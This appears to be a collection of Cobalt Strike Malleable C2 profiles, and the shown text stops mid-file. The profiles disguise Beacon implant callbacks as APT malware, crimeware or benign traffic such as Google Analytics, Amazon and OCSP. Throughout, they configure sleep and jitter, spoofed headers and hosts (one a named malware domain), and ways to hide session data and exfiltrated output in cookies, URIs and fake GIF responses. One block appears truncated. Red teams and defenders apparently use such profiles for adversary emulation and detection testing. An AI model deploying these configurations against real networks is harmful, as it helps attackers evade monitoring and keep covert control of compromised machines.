├── APT
    ├── apt1_virtuallythere.profile
    ├── putter.profile
    ├── pitty_tiger.profile
    ├── string_of_paerls.profile
    ├── comfoo.profile
    ├── etumbot.profile
    ├── taidoor.profile
    ├── meterpreter.profile
    └── havex.profile
├── normal
    ├── rtmp.profile
    ├── ocsp.profile
    ├── randomized.profile
    ├── webbug.profile
    ├── amazon.profile
    ├── webbug_getonly.profile
    ├── safebrowsing.profile
    ├── pandora.profile
    ├── microsoftupdate_getonly.profile
    ├── gmail.profile
    ├── cnnvideo_getonly.profile
    ├── msnbcvideo_getonly.profile
    ├── googledrive_getonly.profile
    ├── bingsearch_getonly.profile
    ├── onedrive_getonly.profile
    ├── wikipedia_getonly.profile
    └── reference.profile
└── crimeware
    ├── backoff.profile
    ├── fiesta2.profile
    ├── fiesta.profile
    ├── asprox.profile
    ├── magnitude.profile
    └── zeus.profile

/APT/apt1_virtuallythere.profile:
--------------------------------------------------------------------------------
# APT1 VIRTUALLYTHERE SSL
#
# Reference: Mandiant's APT1 Report
# Digital Appendix F - SSL Certificates
# http://intelreport.mandiant.com/
#
# Author: @armitagehacker
set sample_name "APT1 Virtually There Malware";

# this is the certificate
# NOTE(review): the certificate subject below is the report-derived indicator (Appendix F);
# the HTTP GET/POST URIs further down read as placeholders rather than sampled traffic — confirm.
https-certificate {
    set C "US";
    set ST "Some-State";
    set O "www.virtuallythere.com";
    set OU "new";
    set CN "new";
}

# since *cough* presumably you're using an HTTPS Beacon...
http-get {
    set uri "/zOMGAPT";

    client {
        metadata {
            netbiosu;
            parameter "tmp";
        }
    }

    server {
        header "Content-Type" "application/octet-stream";

        output {
            print;
        }
    }
}

http-post {
    set uri "/BUYTHEAPTDETECTORNOW";

    client {
        header "Content-Type" "application/octet-stream";

        id {
            uri-append;
        }

        output {
            print;
        }
    }

    server {
        header "Content-Type" "text/html";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/APT/putter.profile:
--------------------------------------------------------------------------------
# Putter Panda HTTPCLIENT Profile
# http://resources.crowdstrike.com/putterpanda/
#
# Author: @armitagehacker

# 500ms is default callback for this Web C2 shell
set sample_name "Putter Panda";

set sleeptime "500";

http-get {
    # Beacon will randomly choose from this pool of URIs
    # NOTE(review): only one URI is configured here, so there is no pool to choose from.
    set uri "/MicrosoftUpdate/ShellEx/KB242742/default.aspx";

    client {
        header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)";

        # deliberate attempt to reproduce bug in HTTPCLIENT
        header "Accept" "*/*, ..., ......, .";

        # encode session metadata into tmp var
        metadata {
            netbiosu;
            parameter "tmp";
        }
    }

    # no special server side indicators as the report didn't say anything one way
    # or the other about these.
    server {
        header "Content-Type" "application/octet-stream";

        output {
            print;
        }
    }
}

http-post {
    set uri "/MicrosoftUpdate/GetUpdate/KB";

    client {
        header "Content-Type" "application/octet-stream";
        header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)";

        id {
            append "/default.asp";
            uri-append;
        }

        output {
            print;
        }
    }

    server {
        header "Content-Type" "text/html";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/rtmp.profile:
--------------------------------------------------------------------------------
#
# Adobe Real-Time Messaging Protocol (RTMP) profile
#
# NOTE(review): the /idle/ and /send/ URIs with application/x-fcs look like RTMPT
# (RTMP tunnelled over HTTP) rather than raw RTMP — confirm against a capture.
#
# Author: @harmj0y
#

set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Shockwave Flash";

http-get {

    set uri "/idle/1376547834/1";

    client {

        header "Accept" "*/*";
        header "Connection" "Keep-Alive";
        header "Cache-Control" "no-cache";
        header "Content-Type" "application/x-fcs";

        metadata {
            base64;
            header "Cookie";
        }
    }

    server {

        header "Content-Type" "application/x-fcs";
        header "Connection" "Keep-Alive";
        header "Server" "FlashCom/3.5.7";
        header "Cache-Control" "no-cache";

        output {
            print;
        }
    }
}

http-post {

    set uri "/send/1376547834/";

    client {

        header "Accept" "*/*";
        header "Connection" "Keep-Alive";
        header "Cache-Control" "no-cache";
        header "Content-Type" "application/x-fcs";

        id {
            uri-append;
        }

        output {
            print;
        }
    }

    server {

        header "Content-Type" "application/x-fcs";
        header "Connection" "Keep-Alive";
        header "Server" "FlashCom/3.5.7";
        header "Cache-Control" "no-cache";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/ocsp.profile:
--------------------------------------------------------------------------------
#
# Online Certificate Status Protocol (OCSP) Profile
# http://tools.ietf.org/html/rfc6960
#
# Author: @harmj0y
#

set sleeptime "20000"; # Use a 20s interval
set jitter "20"; # 20% jitter
set maxdns "255";
set useragent "Microsoft-CryptoAPI/6.1";


http-get {

    set uri "/oscp/";
    # NOTE(review): the path is "/oscp/" (letters transposed) while the Host header names
    # ocsp.verisign.com; that mismatch is a distinguishing feature of this traffic.

    client {
        header "Accept" "*/*";
        header "Host" "ocsp.verisign.com";

        metadata {
            netbios;
            uri-append;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate";
        header "Connection" "keep-alive";

        output {
            print;
        }
    }
}

http-post {

    set uri "/oscp/a/";

    client {

        header "Accept" "*/*";
        header "Host" "ocsp.verisign.com";

        id {
            netbios;
            uri-append;
        }

        output {
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate";
        header "Connection" "keep-alive";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/APT/pitty_tiger.profile:
--------------------------------------------------------------------------------
#
# Pitty Tiger RAT profile
# http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf
#
# One of several RATs used by the Pitty Tiger campaign
#
# Author: @harmj0y
#
set sample_name "Pitty Tiger RAT";

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "20";
set maxdns "255";
set useragent "Microsoft Internet Explorer";

http-get {

    set uri "/FC001/JOHN";

    client {

        header "Host" "newb02.skypetm.com.tw";
        header "Connection" "Keel-Alive";
        # NOTE(review): "Keel-Alive" is presumably a deliberate copy of the sample's misspelt
        # header (see the report above) — confirm; it is a distinctive token in traffic.

        metadata {
            netbiosu;
            uri-append;
        }
    }

    server {

        header "Connection" "Keel-Alive";
        header "Content-Type" "text/html";
        header "Server" "IIS5.0";

        output {
            base64;
            print;
        }
    }
}

http-post {
    set uri "/FC002/JOHN-";

    client {

        header "Host" "newb02.skypetm.com.tw";
        header "Connection" "Keel-Alive";

        id {
            netbiosu;
            uri-append;
        }

        output {
            base64;
            print;
        }
    }

    server {

        header "Connection" "Keel-Alive";
        header "Content-Type" "text/html";
        header "Server" "IIS5.0";

        output {
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/APT/string_of_paerls.profile:
--------------------------------------------------------------------------------
#
# String of Paerls profile
# http://blogs.cisco.com/security/a-string-of-paerls/
#
# Author: @harmj0y
#
set sample_name "String of Paerls";

set sleeptime "30000"; # use a ~30 second main interval
set jitter "30"; # 30% jitter
set maxdns "255";
set useragent "Mozilla/4.0";

http-get {

    # GET request modeled as well as possible based on incomplete information
    set uri "/2/R.exe";

    client {

        header "Content-Type" "application/x-www-form-urlencoded";

        # encode session metadata
        metadata {
            base64;
            header "Cookie";
        }
    }

    server {
        header "Server" "Apache/2";
        header "X-Powered-By" "PHP/5.3.28";
        header "Vary" "User-Agent";
        header "Content-Type" "application/octet-stream";

        output {
            print;
        }
    }
}

http-post {

    set uri "/boss/image.php";

    client {

        header "Content-Type" "application/x-www-form-urlencoded";

        id {
            netbios;
            parameter "id";
        }

        output {
            base64;
            print;
        }
    }

    server {
        header "Server" "Apache/2";
        header "X-Powered-By" "PHP/5.3.28";
        header "Vary" "User-Agent";
        header "Content-Type" "application/octet-stream";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/crimeware/backoff.profile:
--------------------------------------------------------------------------------
#
# Backoff POS Malware
#
# This profile takes steps to dress up the POST side of Beacon's C2 to
# look like Backoff. The GET side is left generic.
#
# Indicators from:
# http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html
# https://gsr.trustwave.com/topics/backoff-pos-malware/backoff-malware-overview/
#
# Author: @armitagehacker
#
#
set sample_name "Backoff POS Malware";

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter

set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

# the relevant indicators
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";

    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";

        id {
            netbios;
            parameter "id";
        }

        output {
            base64;
            # NOTE(review): the id/ui/wv/gr/bv fields below are a fixed literal, so every
            # session on every host sends the identical prefix; only the data= value varies.
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }

    server {
        output {
            print;
        }
    }
}

# No information on backoff use of GET, so generic GET request.
http-get {
    set uri "/updates";

    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/plain";

        output {
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/randomized.profile:
--------------------------------------------------------------------------------
#
# This profile demonstrates the use of the mask transform to randomize aspects of a profile
#

set useragent "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";

# define indicators for an HTTP GET
http-get {
    # we require a stub URI to attach the rest of our data to.
    set uri "/zC";

    client {
        # mask our metadata, base64 encode it, store it in the URI
        metadata {
            mask;
            base64url;
            uri-append;
        }
    }

    server {
        header "Content-Type" "text/plain";

        # prepend some text in case the GET is empty.
        output {
            prepend "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
            mask;
            base64;
            print;
        }
    }
}

# define indicators for an HTTP POST
http-post {
    set uri "/dE";
    set verb "POST";

    client {
        # make it look like we're posting something cool.
        header "Content-Type" "application/x-www-form-urlencoded";

        # ugh, our data has to go somewhere!
        output {
            mask;
            base64url;
            uri-append;
        }

        # randomize and post our session ID
        id {
            mask;
            base64url;
            prepend "v=";
            append "&button=submit";
            print;
        }
    }

    # The server's response to our HTTP POST
    server {
        header "Content-Type" "text/plain";

        # post usually sends nothing, so let's prepend a string, mask it, and
        # base64 encode it. We'll get something different back each time.
        output {
            prepend "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
            mask;
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/APT/comfoo.profile:
--------------------------------------------------------------------------------
#
# Comfoo profile
# http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/
#
# Author: @harmj0y
#

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "20";
set maxdns "255";
set useragent "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)";

http-get {

    set uri "/CWoNaJLBo/VTNeWw11212/";

    client {

        header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*";
        header "Accept-Language" "en-en";
        header "Connection" "Keel-Alive";
        header "Cache-Control" "no-cache";
        # NOTE(review): "en-en" and "Keel-Alive" are presumably copied from the sample as
        # observed in the report — confirm; both are distinctive tokens in traffic.

        metadata {
            netbiosu;
            append "/UTWOqVQ132/";
            uri-append;
        }
    }

    server {

        header "Server" "Apache/2.0.50 (Unix)";
        header "Keep-Alive" "timeout=15, max=90";

        output {
            print;
        }
    }
}

http-post {

    set uri "/CWoNaJLBo/VTNeWw11213/";

    client {

        header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*";
        header "Accept-Language" "en-en";
        header "Connection" "Keel-Alive";
        header "Cache-Control" "no-cache";

        id {
            netbiosu;
            append "/UTWOqVQ132/";
            uri-append;
        }

        output {
            print;
        }
    }

    server {

        header "Server" "Apache/2.0.50 (Unix)";
        header "Keep-Alive" "timeout=15, max=90";

        output {
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/APT/etumbot.profile:
--------------------------------------------------------------------------------
#
# Etumbot Profile
# http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/
#
# Author: @harmj0y
#
set sample_name "Etumbot";

set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/image/";

    client {

        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        # NOTE(review): the stray "l" in "*/*l;q=0.8" and the non-standard "img/jpg"
        # Content-Type in the responses are presumably copied from the sample — confirm
        # against the report; either way they are distinctive.
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";

        metadata {
            netbios;
            append "-.jpg";
            uri-append;
        }
    }

    server {

        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";

        output {
            base64;
            print;
        }
    }
}

http-post {
    set uri "/history/";

    client {

        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";

        id {
            netbiosu;
            append ".asp";
            uri-append;
        }

        output {
            base64;
            print;
        }
    }

    server {

        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";

        output {
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/crimeware/fiesta2.profile:
--------------------------------------------------------------------------------
#
# A second Fiesta Exploit Kit traffic profile
# http://malware-traffic-analysis.net/2014/04/05/index.html
#
# Author: @harmj0y
#
set sample_name "Fiesta Exploit Kit";

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set maxdns "255";
# NOTE(review): no global useragent is set in this file; the User-Agent is supplied per
# block via header, so requests outside those two blocks presumably fall back to the
# default — confirm.

http-get {

    set uri "/v20idaf/";

    client {
        # mimic this Fiesta instance's header information
        header "Accept" "*/*";
        header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)";

        # encode session metadata as close as we can to a Fiesta URI request
        metadata {
            netbios;
            append ";112202;228";
            uri-append;
        }
    }

    server {
        header "Server" "nginx/1.4.4";
        header "Content-Type" "application/octet-stream";
        header "Connection" "close";

        output {
            print;
        }
    }
}

http-post {

    set uri "/";

    client {

        header "Accept" "*/*";
        header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)";

        id {
            netbios;
            uri-append;
        }

        output {
            base64;
            print;
        }
    }

    server {
        header "Server" "nginx/1.4.4";
        header "Content-Type" "application/octet-stream";
        header "Connection" "close";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/crimeware/fiesta.profile:
--------------------------------------------------------------------------------
#
# Fiesta Exploit Kit traffic profile
# http://malware-traffic-analysis.net/2014/04/05/index.html
#
# Author: @harmj0y
#

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set maxdns "255";
set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11";

http-get {

    set uri "/rmvk30g/";

    client {
        # mimic this Fiesta instance's header information
        header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2";
        header "Connection" "keep-alive";

        # encode session metadata as close as we can to a Fiesta URI request
        metadata {
            netbios;
            append ";1;4;1";
            uri-append;
        }
    }

    server {
        header "Server" "Apache/2.2.15 (CentOS)";
        header "X-Powered-By" "PHP/5.3.27";
        header "Content-Type" "application/octet-stream";
        header "Connection" "close";

        output {
            print;
        }
    }
}

http-post {

    set uri "/";

    client {

        # fake out a different user agent for the post back
        header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)";

        id {
            netbios;
            uri-append;
        }

        output {
            base64;
            print;
        }
    }

    # NOTE(review): the GET response above advertises Apache/2.2.15 + PHP while this POST
    # response advertises nginx/1.4.2 from the same host — an inconsistency visible in traffic.
    server {
        header "Server" "nginx/1.4.2";
        header "Content-Type" "text/html";
        header "Connection" "close";

        output {
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/webbug.profile:
--------------------------------------------------------------------------------
# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker

http-get {
    set uri "/__utm.gif";
    client {
        parameter "utmac" "UA-2202604-2";
        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        metadata {
            netbios;
            prepend "__utma";
            parameter "utmcc";
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            # hexdump pixel.gif
            # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
            # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
            # 0000020 01 00 01 00 00 02 01 44 00 3b
            #
            # NOTE(review): the three prepends below total 40 bytes but the dump above is 42:
            # the first and second rows each lose one 00 byte (after 0x80 and after 21 f9 04 01),
            # so what is served is not byte-identical to pixel.gif. The same strings are
            # reused in the http-post block below.

            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";

            print;
        }
    }
}

http-post {
    set uri "/___utm.gif";
    client {
        header "Content-Type" "application/octet-stream";

        id {
            prepend "UA-220";
            append "-2";
            parameter "utmac";
        }

        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        output {
            print;
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

# dress up the staging process too
http-stager {
    server {
        header "Content-Type" "image/gif";
    }
}

--------------------------------------------------------------------------------
/crimeware/asprox.profile:
--------------------------------------------------------------------------------
#
# Asprox botnet traffic profile
# http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
#
# Author: @harmj0y
#
set sample_name "Asprox Botnet";

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "20"; # throw in a 20% jitter
set maxdns "255";
set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)";

http-get {

    set uri "/";

    client {

        header "Accept" "*/*";
        header "Content-Type" "application/x-www-form-urlencoded";
        header "Content-Transfer-Encoding" "base64";
        header "Connection" "Keep-Alive";

        metadata {
            netbiosu;
            uri-append;
        }
    }

    server {

        header "Server" "nginx/1.2.5";
        header "Content-Type" "text/html";
        header "X-Powered-By" "PHP/5.4.4-7";
        header "Vary" "Accept-Encoding";

        output {
            base64;
            print;
        }
    }
}

http-post {

    # random hash to try to simulate the post uri in the report
    set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1";

    client {

        header "Accept" "*/*";
        header "Content-Type" "application/x-www-form-urlencoded";
        header "Content-Transfer-Encoding" "base64";
        header "Connection" "Keep-Alive";

        id {
            parameter "id";
        }

        output {
            base64;
            print;
        }
    }

    server {

        header "Server" "nginx/1.2.5";
        header "Content-Type" "text/html";
        header "X-Powered-By" "PHP/5.4.4-7";
        header "Vary" "Accept-Encoding";

        output {
            base64;
            print;
        }
    }
}

--------------------------------------------------------------------------------
/crimeware/magnitude.profile:
--------------------------------------------------------------------------------
#
# Magnitude Exploit Kit traffic profile
# http://malware-traffic-analysis.net/2014/06/17/index.html
#
# Author: @harmj0y
#
set sample_name "Magnitude Exploit Kit";

set sleeptime "45000"; # use a ~45s delay between callbacks
set jitter "50"; # throw in a 50% jitter
set maxdns "255";
set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";

http-get {

    set uri "/themes/index.php";

    client {

        header "Accept" "image/jpeg, application/*";
        header "Referer" "http://www.bankofbotswana.bw/";
        header "Accept-Encoding" "gzip, deflate";

        # throw in a known bad malware domain
        header "Host" "wilfredcostume.bamoon.com";

        metadata {
            netbios;
            parameter "id";
        }
    }

    server {
        header "Server" "Apache/2.2.17 (Ubuntu)";
        header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8";
        header "Content-Encoding" "gzip";
        # NOTE(review): Content-Encoding claims gzip but the output below is printed raw with
        # no compression transform, so the body is not actually gzip data; the same applies
        # to the http-post response in this file.
        header "Content-Type" "text/html";

        output {
            print;
        }
    }
}

http-post {

    set uri "/work/1.php";

    client {

        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US;q=0.5,en;q=0.3";
        header "Accept-Encoding" "gzip, deflate";
        header "Content-Type" "application/octet-stream";

        id {
            netbiosu;
            parameter "sid";
        }

        output {
            print;
        }
    }

    server {

        header "Server" "Apache/2.2.17 (Ubuntu)";
        header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8";
        header "Content-Encoding" "gzip";
        header "Content-Type" "text/html";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/APT/taidoor.profile:
--------------------------------------------------------------------------------
#
# Taidoor Profile
# http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
#
# Author: @harmj0y
#
set sample_name "Taidoor";

set sleeptime "40000"; # use a ~40 second main interval
set jitter "35"; # 35% jitter
set maxdns "255";
set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";

http-get {

    set uri "/login.jsp /parse.jsp /page.jsp /default.jsp /index.jsp /process.jsp /security.jsp /user.jsp";

    client {

        header "Connection" "Keep-Alive";
        header "Cache-Control" "no-cache";

        # encode session metadata
        metadata {
            netbiosu;
            parameter "mn";
        }
    }

    # no special server side indicators as the report didn't say anything one way
    # or the other about these.
    server {
        header "Server" "Microsoft-IIS/5.0";
        header "Content-Type" "text/html";
        header "Connection" "close";

        output {
            base64;
            # NOTE(review): rendered source lines 40-43 are missing here and these
            # prepend/append strings look truncated (likely HTML tags stripped by the page
            # renderer) — check the original file before relying on this block.
            prepend "\n";
            append "\n";
            append "\n";
            print;
        }
    }
}

http-post {
    set uri "/submit.jsp";

    client {

        header "Connection" "Keep-Alive";
        header "Cache-Control" "no-cache";

        id {
            netbios;
            parameter "du";
        }

        output {
            print;
        }
    }

    server {
        header "Server" "Microsoft-IIS/5.0";
        header "Content-Type" "text/html";
        header "Connection" "close";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/amazon.profile:
--------------------------------------------------------------------------------
#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#

set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

http-get {

    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";

    client {

        header "Accept" "*/*";
        header "Host" "www.amazon.com";

        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
            header "Cookie";
            # NOTE(review): reading the transforms in order, the Cookie becomes
            # "skin=noskin;session-token=<base64>csm-hit=..." with no ";" between the token
            # value and csm-hit, so the session-token pair is malformed; the csm-hit value
            # is also a fixed literal shared by every session.
        }
    }

    server {

        header "Server" "Server";
        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";
        # NOTE(review): the x-amz-id-* values are constants repeated on every response, and
        # Content-Encoding claims gzip while the output is printed raw.

        output {
            print;
        }
    }
}

http-post {

    set uri "/N4215/adj/amzn.us.sr.aps";

    client {

        header "Accept" "*/*";
        header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "www.amazon.com";

        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";

        id {
            parameter "sn";
        }

        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";

        output {
            base64;
            print;
        }
    }

    server {

        header "Server" "Server";
        header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
        header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";

        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/webbug_getonly.profile:
--------------------------------------------------------------------------------
# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker

set sleeptime "5000";

http-get {
    set uri "/___utm.gif";
    client {
        parameter "utmac" "UA-2202604-2";
        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        metadata {
            base64url;
            prepend "__utma";
            parameter "utmcc";
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            # hexdump pixel.gif
            # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
            # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
            # 0000020 01 00 01 00 00 02 01 44 00 3b
            #
            # NOTE(review): the three prepends below total 40 bytes but the dump above is 42:
            # the first and second rows each lose one 00 byte, so what is served is not
            # byte-identical to pixel.gif. The same strings are reused in the http-post and
            # http-stager blocks below.
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";

            print;
        }
    }
}

http-post {
    set uri "/__utm.gif";
    set verb "GET";
    client {
        id {
            prepend "UA-220";
            append "-2";
            parameter "utmac";
        }

        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        output {
            base64url;
            prepend "__utma";
            parameter "utmcc";
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

# dress up the staging process too
http-stager {
    set uri_x86 "/_init.gif";
    set uri_x64 "/__init.gif";

    server {
        header "Content-Type" "image/gif";

        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/safebrowsing.profile:
--------------------------------------------------------------------------------
#
# Safebrowsing Comms profile
# https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign
#
# Author: @harmj0y
#

set sleeptime "30000"; # Use a 30s interval
set jitter "20"; # 20% jitter
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

http-get {

    # change/randomize this as you wish
    set uri "/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2";

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";

        metadata {
            netbios;
            prepend "PREF=ID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/vnd.google.safebrowsing-chunk";
        header "X-Content-Type-Options" "nosniff";
        header "Content-Encoding" "gzip";
        # NOTE(review): Content-Encoding claims gzip but the output is printed raw, and the
        # Age value is a constant repeated on every response; both hold for the http-post
        # response in this file as well.
        header "X-XSS-Protection" "1; mode=block";
        header "X-Frame-Options" "SAMEORIGIN";
